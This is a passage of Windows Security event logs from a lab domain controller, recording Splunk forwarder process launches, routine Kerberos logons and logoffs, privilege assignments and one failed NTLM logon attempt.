Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1b14
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:46:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264935
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1b38
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:46:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264934
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1560
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:46:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264936
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x9a4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:46:11 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4625
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264938
Keywords=Audit Failure
Message=An account failed to log on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Type: 3
Account For Which Logon Failed:
Security ID: NULL SID
Account Name: CCSADMIN
Account Domain:
Failure Information:
Failure Reason: Unknown user name or bad password.
Status: 0xC000006D
Sub Status: 0xC0000064
Process Information:
Caller Process ID: 0x0
Caller Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 193.169.255.245
Source Port: 0
Detailed Authentication Information:
Logon Process: NtLmSsp
Authentication Package: NTLM
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon request fails. It is generated on the computer where access was attempted.
The Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network).
The Process Information fields indicate which account and process on the system requested the logon.
The Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The authentication information fields provide detailed information about this specific logon request.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:46:11 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264937
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Delegation
New Logon:
Security ID: ATTACKRANGE\WIN-HOST-797$
Account Name: WIN-HOST-797$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x89141F
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {DC6104D6-8644-C624-5E2A-37E68DB9CAB8}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 10.0.1.15
Source Port: 54074
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:46:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264939
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1810
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:46:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264941
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xba4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:46:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264940
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1bf8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:46:21 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264942
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: ATTACKRANGE\WIN-HOST-797$
Account Name: WIN-HOST-797$
Account Domain: ATTACKRANGE
Logon ID: 0x89141F
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:46:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264945
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8934D1
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:46:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264944
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8934D1
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 53845
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:46:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264943
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8934D1
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:47:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264946
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x18f0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:47:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264948
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x2c8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:47:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264947
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1bdc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:47:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264949
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1890
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:47:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264950
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xd38
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:47:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264952
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1a7c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:47:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264951
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1be4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:47:26 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264958
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8974FC
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:47:26 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264957
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8974FC
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 53854
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:47:26 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264956
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8974FC
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
